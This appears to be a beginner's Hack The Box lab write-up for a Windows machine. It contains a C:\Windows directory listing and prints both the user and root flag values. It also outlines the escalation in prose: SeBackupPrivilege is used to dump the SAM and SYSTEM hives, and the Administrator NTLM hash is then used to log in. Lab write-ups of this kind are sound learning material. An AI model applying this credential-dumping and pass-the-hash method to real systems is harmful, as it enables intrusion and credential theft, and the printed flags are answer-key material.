Logs D 0 Mon Sep 23 21:46:36 2024
lsasetup.log A 1378 Fri Mar 15 00:55:22 2024
Media D 0 Sat May 8 14:04:49 2021
mib.bin A 43131 Sat May 8 13:44:27 2021
Microsoft.NET DR 0 Wed Feb 19 16:41:39 2025
Migration D 0 Sat May 8 13:50:24 2021
ModemLogs D 0 Sat May 8 13:50:24 2021
notepad.exe A 225280 Fri Aug 30 04:11:33 2024
ntbtlog.txt A 117934 Tue Aug 27 01:42:56 2024
NTDS D 0 Wed Feb 19 16:31:26 2025
OCR D 0 Sat May 8 15:07:23 2021
Offline Web Pages DR 0 Sat May 8 13:50:27 2021
Panther D 0 Thu Aug 22 04:29:22 2024
Performance D 0 Sat May 8 13:50:24 2021
PFRO.log A 4718 Wed Feb 19 16:31:15 2025
PLA D 0 Sat May 8 14:04:50 2021
PolicyDefinitions D 0 Mon Sep 23 22:05:40 2024
Prefetch Dn 0 Fri Mar 15 00:56:31 2024
PrintDialog DR 0 Fri Aug 30 04:21:04 2024
Provisioning D 0 Sat May 8 13:50:24 2021
regedit.exe A 397312 Fri Aug 30 04:09:12 2024
Registration D 0 Wed Feb 19 16:31:44 2025
RemotePackages D 0 Sat May 8 14:04:50 2021
rescache D 0 Sat May 8 13:50:24 2021
Resources D 0 Sat May 8 14:04:50 2021
SchCache D 0 Sat May 8 13:50:24 2021
schemas D 0 Sat May 8 14:04:50 2021
security D 0 Fri Aug 23 02:49:01 2024
ServerStandard.xml A 48139 Sat May 8 13:45:52 2021
ServerStandardEval.xml A 48122 Sat May 8 13:45:52 2021
ServiceProfiles D 0 Fri Mar 15 00:55:34 2024
ServiceState D 0 Fri Mar 15 00:56:22 2024
servicing D 0 Fri Aug 30 04:21:04 2024
Setup D 0 Sat May 8 13:54:56 2021
ShellComponents D 0 Fri Aug 30 04:21:04 2024
ShellExperiences D 0 Fri Aug 30 04:21:04 2024
SKB D 0 Sat May 8 14:04:51 2021
SoftwareDistribution D 0 Thu Mar 14 16:13:48 2024
Speech D 0 Sat May 8 13:50:24 2021
Speech_OneCore D 0 Sat May 8 13:50:24 2021
splwow64.exe A 192512 Fri Aug 30 04:11:10 2024
System D 0 Sat May 8 13:50:24 2021
system.ini A 219 Sat May 8 13:48:31 2021
System32 D 0 Wed Feb 19 16:35:50 2025
SystemApps D 0 Sat May 8 14:04:51 2021
SystemResources D 0 Mon Sep 23 22:05:41 2024
SystemTemp D 0 Wed Feb 19 16:59:41 2025
SYSVOL D 0 Thu Mar 14 16:38:56 2024
SysWOW64 D 0 Mon Sep 23 22:05:41 2024
TAPI D 0 Sat May 8 13:50:24 2021
Tasks D 0 Fri Mar 15 00:56:17 2024
Temp D 0 Wed Feb 19 16:36:49 2025
tracing D 0 Sat May 8 13:50:24 2021
twain_32 D 0 Sat May 8 13:50:33 2021
twain_32.dll A 82944 Mon Sep 23 21:57:59 2024
Vss D 0 Sat May 8 13:50:24 2021
WaaS D 0 Sat May 8 13:50:24 2021
Web D 0 Sat May 8 14:04:51 2021
win.ini A 92 Sat May 8 13:48:31 2021
WindowsShell.Manifest AHR 670 Sat May 8 13:44:27 2021
WindowsUpdate.log A 276 Wed Feb 19 23:36:56 2025
winhlp32.exe A 12288 Sat May 8 13:45:10 2021
WinSxS D 0 Mon Sep 23 22:06:57 2024
WMSysPr9.prx A 316640 Sat May 8 13:44:02 2021
write.exe A 28672 Sat May 8 03:28:00 2021
4168447 blocks of size 4096. 420048 blocks available
I honestly don’t know where to look now, as this is my first Windows machine in HTB. So I randomly checked and got nowhere.
Similarly, I checked the C$ share, slowly navigated to Emily’s Desktop and found the user.txt file. User flag: 850e88885d9cc255bd699fe0e1372612
After this, the machine I was playing on was already spoiled and rooted, so I tried to reset it multiple times, without success. So I stuck with the writeup for my learning. Anyway, I wouldn’t have gone far on the privilege escalation.
Privilege Escalation
![[Screenshot 2025-02-19 at 18.35.26.png]]
We have a higher privilege than required: SeBackupPrivilege.
So we dump the SAM and SYSTEM registry hives, which hold the local account hashes.
![[Screenshot 2025-02-19 at 18.37.59.png]]
![[Screenshot 2025-02-19 at 18.40.02.png]]
With the Administrator NTLM hash we can connect as Administrator and get root.txt from the Desktop.
Root flag: 1c29d8a676c3db97081e0200710ae19f